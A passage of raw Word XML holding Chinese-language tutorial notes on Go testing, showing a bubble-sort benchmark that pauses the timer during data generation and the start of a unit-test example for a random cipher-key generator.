    <w:p w14:paraId="6DBCB3C1" w14:textId="77777777" w:rsidR="00C052BC" w:rsidRDefault="00C052BC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>"time"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B48E5E6" w14:textId="77777777" w:rsidR="00C052BC" w:rsidRDefault="00C052BC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A8B33F" w14:textId="77777777" w:rsidR="00C052BC" w:rsidRDefault="00C052BC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00F15A1F" w14:textId="77777777" w:rsidR="00C052BC" w:rsidRDefault="00C052BC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>func generateWithCap(n int) []int {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461B0FC2" w14:textId="77777777" w:rsidR="00C052BC" w:rsidRDefault="00C052BC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>rand.Seed(time.Now().UnixNano())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17385DAC" w14:textId="77777777" w:rsidR="00C052BC" w:rsidRDefault="00C052BC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>nums := make([]int, 0, n)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686E4668" w14:textId="77777777" w:rsidR="00C052BC" w:rsidRDefault="00C052BC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>for i := 0; i &lt; n; i++ {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698FE316" w14:textId="77777777" w:rsidR="00C052BC" w:rsidRDefault="00C052BC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>nums = append(nums, rand.Int())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5007C4FE" w14:textId="77777777" w:rsidR="00C052BC" w:rsidRDefault="00C052BC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551D23BB" w14:textId="77777777" w:rsidR="00C052BC" w:rsidRDefault="00C052BC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>return nums</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F0A682" w14:textId="77777777" w:rsidR="00C052BC" w:rsidRDefault="00C052BC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0030A073" w14:textId="77777777" w:rsidR="00C052BC" w:rsidRDefault="00C052BC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6487F95F" w14:textId="77777777" w:rsidR="00C052BC" w:rsidRDefault="00C052BC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>func bubbleSort(nums []int) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F76A80D" w14:textId="77777777" w:rsidR="00C052BC" w:rsidRDefault="00C052BC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>for i := 0; i &lt; len(nums); i++ {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1619CA39" w14:textId="77777777" w:rsidR="00C052BC" w:rsidRDefault="00C052BC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>for j := 1; j &lt; len(nums)-i; j++ {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766FBBD4" w14:textId="77777777" w:rsidR="00C052BC" w:rsidRDefault="00C052BC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>if nums[j] &lt; nums[j-1] {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3785AD07" w14:textId="77777777" w:rsidR="00C052BC" w:rsidRDefault="00C052BC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>nums[j], nums[j-1] = nums[j-1], nums[j]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4BA682" w14:textId="77777777" w:rsidR="00C052BC" w:rsidRDefault="00C052BC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573F8F35" w14:textId="77777777" w:rsidR="00C052BC" w:rsidRDefault="00C052BC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C65D71F" w14:textId="77777777" w:rsidR="00C052BC" w:rsidRDefault="00C052BC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FA8533" w14:textId="77777777" w:rsidR="00C052BC" w:rsidRDefault="00C052BC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD4AD34" w14:textId="77777777" w:rsidR="00C052BC" w:rsidRDefault="00C052BC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C0555CC" w14:textId="77777777" w:rsidR="00C052BC" w:rsidRDefault="00C052BC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">func </w:t>
      </w:r>
      <w:r w:rsidRPr="00C052BC">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>BenchmarkBubbleSort</w:t>
      </w:r>
      <w:r>
        <w:t>(b *testing.B) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B9258A" w14:textId="77777777" w:rsidR="00C052BC" w:rsidRDefault="00C052BC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>for n := 0; n &lt; b.N; n++ {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E1DBFA" w14:textId="77777777" w:rsidR="00C052BC" w:rsidRPr="00C052BC" w:rsidRDefault="00C052BC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C052BC">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>b.StopTimer()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C0CC2E" w14:textId="77777777" w:rsidR="00C052BC" w:rsidRDefault="00C052BC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>nums := generateWithCap(10000)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0665C9B2" w14:textId="77777777" w:rsidR="00C052BC" w:rsidRPr="00C052BC" w:rsidRDefault="00C052BC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C052BC">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>b.StartTimer()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F761FF" w14:textId="77777777" w:rsidR="00C052BC" w:rsidRDefault="00C052BC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>bubbleSort(nums)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72772D2E" w14:textId="77777777" w:rsidR="00C052BC" w:rsidRDefault="00C052BC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44108463" w14:textId="610D2ABB" w:rsidR="00423D0B" w:rsidRDefault="00C052BC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D16193A" w14:textId="43D29498" w:rsidR="00423D0B" w:rsidRDefault="00423D0B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="009B72D9" w14:textId="35A79F43" w:rsidR="00423D0B" w:rsidRDefault="00141C89" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>测试文件实战</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9BBFAE" w14:textId="77777777" w:rsidR="00141C89" w:rsidRDefault="00141C89" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="246BB6E3" w14:textId="3096FFF1" w:rsidR="006B0724" w:rsidRDefault="006B0724" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>单参数简单模块测试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADE34B9" w14:textId="7335D718" w:rsidR="00141C89" w:rsidRDefault="00141C89" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>比如，源代码如下，我右键该函数，生成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>test</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D186326" w14:textId="77777777" w:rsidR="00141C89" w:rsidRDefault="00141C89" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="2B2B2B"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">func </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFC66D"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>CipherKeyGenerator</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">(ByteLength </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>) {</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808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>仅接受</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>32</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>作为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>参数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>nonce</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">err := </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="B09D79"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>generateNonce</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(ByteLength)</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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">err != </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">nil </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>{</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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="AFBF7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="B09D79"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Fatal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(err)</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t>}</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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="AFBF7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>fmt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="B09D79"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Println</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"Cipher key's hex string:"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="AFBF7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>hex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="B09D79"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>EncodeToString</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(nonce))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5452A13D" w14:textId="77777777" w:rsidR="00141C89" w:rsidRPr="00141C89" w:rsidRDefault="00141C89" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="091FB053" w14:textId="15ED6C8B" w:rsidR="00141C89" w:rsidRDefault="00141C89" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>生成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>test</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用例，编写测试：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057BAE87" w14:textId="77777777" w:rsidR="00141C89" w:rsidRPr="00141C89" w:rsidRDefault="00141C89" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A054817" w14:textId="77777777" w:rsidR="00141C89" w:rsidRDefault="00141C89" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="2B2B2B"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">package </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="AFBF7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>secretGenerator</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="AFBF7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="AFBF7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
